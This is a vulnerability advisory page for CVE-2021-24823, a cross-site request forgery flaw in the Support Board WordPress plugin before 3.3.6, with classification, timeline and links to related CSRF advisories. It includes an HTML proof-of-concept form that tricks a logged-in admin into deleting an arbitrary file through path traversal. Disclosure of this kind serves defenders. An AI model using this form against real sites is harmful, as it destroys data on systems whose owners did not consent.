Support Board < 3.3.6 – Arbitrary File Deletion via CSRF | CVE 2021-24823 | Plugin Vulnerabilities

Description

The plugin does not have any CSRF checks in actions handled by the include/ajax.php file, which could allow attackers to make logged in users do unwanted actions. For example, make an admin delete arbitrary files

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-content/plugins/supportboard/supportboard/include/ajax.php" method="POST">
      <input type="hidden" name="function" value="delete-file" />
      <input type="hidden" name="path" value="/../yolo.php" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 3.3.6

References

CVE

URL

https://noob3xploiter.medium.com/support-board-3-3-4-arbitrary-file-deletion-to-remote-code-execution-da4c45b45c83

YouTube Video

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter twitter

Verified

Yes

WPVDB ID

1bdebd9e-a7f2-4f55-b5b0-185eb619ebaf

Timeline

Publicly Published

2021-10-18 (about 2 years ago)

Added

2022-01-26 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2016-02-16

Title

ALO EasyMail Newsletter < 2.7.0 - Cross-Site Request Forgery (CSRF)

Published

2022-10-25

Title

SEO Redirection Plugin < 9.1 - Multiple CSRF

Published

2021-12-30

Title

Link Library < 7.2.8 - Library Settings Reset via CSRF

Published

2024-04-11

Title

WP Mail Catcher < 2.1.7 - Cross-Site Request Forgery

Published

2023-10-25

Title

Category SEO Meta Tags <= 2.5 - Cross-Site Request Forgery via csmt_admin_options